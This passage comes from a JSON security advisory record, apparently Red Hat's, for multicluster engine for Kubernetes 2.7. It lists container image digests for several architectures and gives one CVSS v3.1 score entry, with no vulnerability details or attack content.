"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
